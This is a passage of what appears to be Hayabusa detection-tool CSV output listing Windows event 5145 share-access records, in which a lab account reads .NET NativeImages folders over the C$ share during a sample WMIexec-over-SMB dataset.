+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\c5bf2f5c3e13726b3984a900221e1778 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Core | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Core\c1194e56644c7688e7eb0f68a57dcc30 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data\8a7f63a63249ceccb5c51a9a372aaf64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | 
Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity\9332198f4736c780facfd62fead6fa26 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq\afe9ad217242ffe7adeeebf7417a0e56 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services\ee663803638dd6a1e68078d00330c716 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml\a686774445eff8eba0a781106f24b040 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9#\6255822d609f7753b8b77a030c397503 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8#\730ce0d11e99c329a9ab7bd75787f1bf | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf#\3d5b722235db7e8a8c7d1344c7221c33 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462#\003de8140f5201b90706bed8c0b34d9a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17#\8b98eff35de01ce97f419f50f85f6123 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment\53494598e1b6d05a1c7e3020cc4e9106 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Design | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Design\52a567b78cdfcd6f0926ba88bd575776 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: 
\??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Device | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Device\7270490235668fa0578aec716a28ce87 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2#\54c0c8fb72275b54709f09380c489b31 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5#\8f83846bacd706e939a5ed0f8b5e3a25 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#\8f81b927dcc93ba9ce82d9b8a45d3ee6 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252#\37cc106c66bc77ec23840bde30a2b4ad | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\ddb52221ad0200b7c2e0a308e47d5c7c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic\93aa8a60d293a05752aca14646afe6d2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#\65b4d38e24dfdd935b19ba1de243c244 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.616 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377#\20e180f5a613fa6fc6d2734676e45df9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff#\c44a74a8e4b895c50ca0a52e97d6428a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel\15e0783372e02bd437cab8ac76420124 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8#\f7a43000e540605d6e0e171da4c2f1d4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5# | IP Addr: 10.23.23.9 | LID: 